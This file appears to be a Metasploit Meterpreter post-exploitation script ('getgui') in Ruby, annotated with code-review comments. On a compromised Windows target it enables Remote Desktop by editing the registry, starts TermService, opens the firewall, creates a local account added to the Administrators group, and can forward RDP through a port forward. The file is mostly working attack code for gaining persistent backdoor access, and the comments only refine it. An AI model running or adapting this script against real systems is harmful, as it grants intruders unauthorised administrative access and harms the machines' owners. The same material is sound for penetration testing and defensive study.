# $Id$
#
# Meterpreter script for enabling Remote Desktop on Windows 2003, Windows Vista
# Windows 2008 and Windows XP targets using native windows commands.
# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
# Support for German Systems added by L0rdAli3n debian5[at]web.de
# Version: 0.1.2
# Note: Port Forwarding option provided by Natron at natron[at]invisibledenizen.org
# We are still working on making this option more stable.
################## Variable Declarations ##################
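session = client

# Host name as reported by the compromised system. This is data supplied by the
# remote side, so it is sanitized below before it becomes part of a local path.
host_name = client.sys.config.sysinfo['Computer']

# Timestamp suffix appended to the per-run log directory and cleanup file name.
# NOTE(review): the format is %Y%m%d.%M%S, i.e. it carries no hour field; kept
# as-is so the naming matches other scripts, but two runs on the same day in
# different hours can collide on the same minute:second.
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")

# Strip path separators and leading dots from the remote-supplied name so a
# value containing separators or '..' cannot steer the log directory outside
# Msf::Config.log_directory. A nil name degrades to an empty prefix instead of
# raising on string concatenation.
safe_host = host_name.to_s.gsub(%r{[\\/]}, '_').sub(/\A\.+/, '_')

# Per-host, per-run directory for everything this script writes locally
logs = ::File.join(Msf::Config.log_directory, 'getgui', safe_host + filenameinfo)

# Create the log directory
::FileUtils.mkdir_p(logs)

# Cleanup resource script: the helper methods below append one undo command per
# change they make on the target. Instance variable so the defs can reach it
# (top-level locals are not visible inside def bodies).
@dest = ::File.join(logs, "clean_up_" + filenameinfo + ".rc")

# Command-line options. NOTE: this is a class variable at script top level;
# kept that way because usage() and the parser call in MAIN reference it.
# The -l help lists every language addrdpusr knows; -f takes the local port
# that MAIN uses for the portfwd listener.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-e" => [ false, "Enable RDP only." ],
  "-l" => [ true, "The language switch\n\t\tPossible Options: 'de_DE', 'en_EN', 'fr_FR' / default is: 'en_EN'" ],
  "-p" => [ true, "The Password of the user to add." ],
  "-u" => [ true, "The Username of the user to add." ],
  "-f" => [ true, "Forward RDP Connection (takes the local port to listen on)." ]
)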
# Print the help banner plus the generated option summary, then end the script
# by raising Rex::Script::Completed (this never returns).
def usage
  [
    "Windows Remote Desktop Enabler Meterpreter Script",
    "Usage: getgui -u <username> -p <password>",
    "Or: getgui -e"
  ].each { |line| print_line(line) }
  print(@@exec_opts.usage)
  raise Rex::Script::Completed
end
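# Resolve the language used by addrdpusr to pick localized group names.
#
# Fixes two defects of the earlier version: a stray `puts "langdetect"` debug
# line that bypassed the framework output, and a lost result — the detected or
# defaulted language was assigned to the local `lang` but never returned, so
# callers could only ever see the value they passed in.
#
# @param lang [String, nil] language given with -l, or nil to auto-detect
# @return [String, nil] language to use ('en_EN' when detection fails); nil only
#   when an error was rescued below
def langdetect(lang)
  if lang
    print_status("Language set by user to: '#{lang}'")
  else
    print_status("Language detection started")
    # NOTE(review): the detected value is later compared verbatim with
    # 'en_EN' / 'de_DE' / 'fr_FR' in addrdpusr; confirm sysinfo reports the
    # language in that exact form.
    lang = client.sys.config.sysinfo['System Language']
    if lang
      print_status("\tLanguage detected: #{lang}")
    else
      print_error("\tLanguage detection failed, falling back to default 'en_EN'")
      lang = "en_EN"
    end
  end
  lang
rescue ::StandardError => e
  # Narrowed from ::Exception so interrupts and script completion are not swallowed
  print_status("The following Error was encountered: #{e.class} #{e}")
  nil
end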
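# Enable Remote Desktop by clearing fDenyTSConnections under the Terminal Server
# key, recording the reverse edit in the cleanup resource script.
#
# Artifact left on the target: HKLM\System\CurrentControlSet\Control\Terminal
# Server\fDenyTSConnections written as REG_DWORD 0 (only when it was 1).
#
# @return [nil]
def enablerd
  key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'
  value = "fDenyTSConnections"
  begin
    v = registry_getvaldata(key, value)
    print_status "Enabling Remote Desktop"
    if v.nil?
      # Presumably registry_getvaldata yields nil when the value cannot be
      # read — confirm. Previously this case was reported as "already enabled".
      print_error "\tCould not read #{value}; leaving the Terminal Server setting untouched"
    elsif v == 1
      print_status "\tRDP is disabled; enabling it ..."
      registry_setvaldata(key, value, 0, "REG_DWORD")
      # Undo entry built from the same key/value names used above instead of a
      # second hand-typed copy of the path.
      file_local_write2file(@dest, "reg setval -k \"#{key}\" -v '#{value}' -d \"1\"")
    else
      print_status "\tRDP is already enabled"
    end
  rescue ::StandardError => e
    # Narrowed from ::Exception so interrupts and script completion are not swallowed
    print_status("The following Error was encountered: #{e.class} #{e}")
  end
end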
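# Set the TermService startup type to auto, start it, and open the Remote
# Desktop exception in the Windows firewall, appending undo commands to @dest.
#
# Two cleanup defects are corrected here: the service start type is restored to
# the value that was actually found (3 = demand/manual, 4 = disabled) rather
# than always 'disabled', and the firewall undo entry now uses `mode = disable`
# — the earlier entry re-ran the enable command and wrapped it in single quotes,
# which cmd.exe does not treat as quoting.
#
# Artifacts left on the target: TermService Start value, a running TermService,
# and the remotedesktop firewall service exception.
#
# @return [nil]
def enabletssrv
  rdp_key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService"
  begin
    v2 = registry_getvaldata(rdp_key, "Start")
    print_status "Setting Terminal Services service startup mode"
    if v2 != 2
      print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..."
      service_change_startup("TermService", "auto")
      # SCM Start values: 2 = auto, 3 = demand (manual), 4 = disabled. Anything
      # unexpected keeps the previous behaviour of restoring to 'disabled'.
      restore = { 3 => "demand", 4 => "disabled" }.fetch(v2, "disabled")
      file_local_write2file(@dest, "execute -H -f cmd.exe -a \"/c sc config termservice start= #{restore}\"")
      cmd_exec("sc start termservice")
      file_local_write2file(@dest, "execute -H -f cmd.exe -a \"/c sc stop termservice\"")
    else
      print_status "\tTerminal Services service is already set to auto"
    end

    # Enabling Exception on the Firewall
    print_status "\tOpening port in local firewall if necessary"
    cmd_exec('netsh firewall set service type = remotedesktop mode = enable')
    # NOTE(review): the prior firewall state is not queried, so this undo entry
    # disables the exception even if it was already open before the run.
    file_local_write2file(@dest, "execute -H -f cmd.exe -a \"/c netsh firewall set service type = remotedesktop mode = disable\"")
  rescue ::StandardError => e
    # Narrowed from ::Exception so interrupts and script completion are not swallowed
    print_status("The following Error was encountered: #{e.class} #{e}")
  end
end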
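# Create a local account and add it to the Remote Desktop Users and
# Administrators groups, recording the `net user /delete` undo entry in @dest.
#
# Defect corrected: an unknown or nil `lang` used to leave `rdu`/`admin` nil,
# so `net localgroup` was run with an empty group name. Unknown values now fall
# back to the English names, matching the default langdetect uses.
#
# Artifacts left on the target: a new local user and two group memberships,
# created through cmd.exe `net user` / `net localgroup`.
#
# @param session [Object] unused; commands go through cmd_exec. Kept so the
#   call in MAIN keeps working.
# @param username [String] account to create; interpolated unquoted into the
#   command line, so names with spaces or cmd metacharacters will not work
# @param password [String] account password; also interpolated unquoted, and
#   echoed into the status output (and therefore any console log)
# @param lang [String, nil] 'en_EN', 'de_DE' or 'fr_FR'; anything else → en_EN
# @return [nil]
def addrdpusr(session, username, password, lang)
  # Changing the group names depending on the selected language
  case lang
  when "en_EN"
    rdu = "Remote Desktop Users"
    admin = "Administrators"
  when "de_DE"
    rdu = "Remotedesktopbenutzer"
    admin = "Administratoren"
  when "fr_FR"
    # NOTE(review): the accented character in this group name appears
    # mis-encoded on this page; confirm the bytes in the source file.
    rdu = "Utilisateurs du Bureau <20> distance"
    admin = "Administrateurs"
  else
    print_error "\tUnknown language '#{lang}', using 'en_EN' group names"
    rdu = "Remote Desktop Users"
    admin = "Administrators"
  end

  print_status "Setting user account for logon"
  print_status "\tAdding User: #{username} with Password: #{password}"
  begin
    cmd_exec("net user #{username} #{password} /add")
    # Deleting the account also drops its group memberships, so one undo
    # entry covers all three commands below.
    file_local_write2file(@dest, "execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
    print_status "\tAdding User: #{username} to local group '#{rdu}'"
    cmd_exec("net localgroup \"#{rdu}\" #{username} /add")
    print_status "\tAdding User: #{username} to local group '#{admin}'"
    cmd_exec("net localgroup #{admin} #{username} /add")
    print_status "You can now login with the created user"
  rescue ::StandardError => e
    # Narrowed from ::Exception so interrupts and script completion are not swallowed
    print_status("The following Error was encountered: #{e.class} #{e}")
  end
end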
# Print the script banner (title and author credit) through the framework's
# status output. Returns whatever the last print_status call returns.
def message
  banner = [
    "Windows Remote Desktop Configuration Meterpreter Script by Darkoperator",
    "Carlos Perez carlos_perez@darkoperator.com"
  ]
  banner.map { |line| print_status(line) }.last
end
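################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lang = nil
# Default listener port. Every -f use overwrites it with the option value, so
# this default is only reached if the parser ever passes -f without a value.
lport = 1024 + rand(1024)
enbl = nil
frwrd = nil

@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-u"
    usr = val
  when "-p"
    pass = val
  when "-h"
    usage
  when "-l"
    lang = val
  when "-f"
    frwrd = true
    lport = val
  when "-e"
    enbl = true
  end
}

# -f carries a port number; reject anything that is not a usable TCP port
# before it is interpolated into the portfwd command below.
if frwrd
  port_arg = lport
  lport = lport.to_i
  unless (1..65535).include?(lport)
    print_error("Invalid local port for -f: '#{port_arg}'")
    usage
  end
end

if enbl
  message
  enablerd()
  enabletssrv()
  print_status("For cleanup use command: run multi_console_command -rc #{@dest}")
elsif usr && pass
  message
  # NOTE(review): the value langdetect computes is not assigned back here, so
  # addrdpusr receives the -l value as given (nil when -l was omitted).
  langdetect(lang)
  enablerd()
  enabletssrv()
  addrdpusr(session, usr, pass, lang)
  print_status("For cleanup use command: run multi_console_command -rc #{@dest}")
else
  usage
end

if frwrd
  print_status("Starting the port forwarding at local port #{lport}")
  # The listener binds 0.0.0.0, i.e. every interface of the operator host.
  client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 3389 -r 127.0.0.1")
end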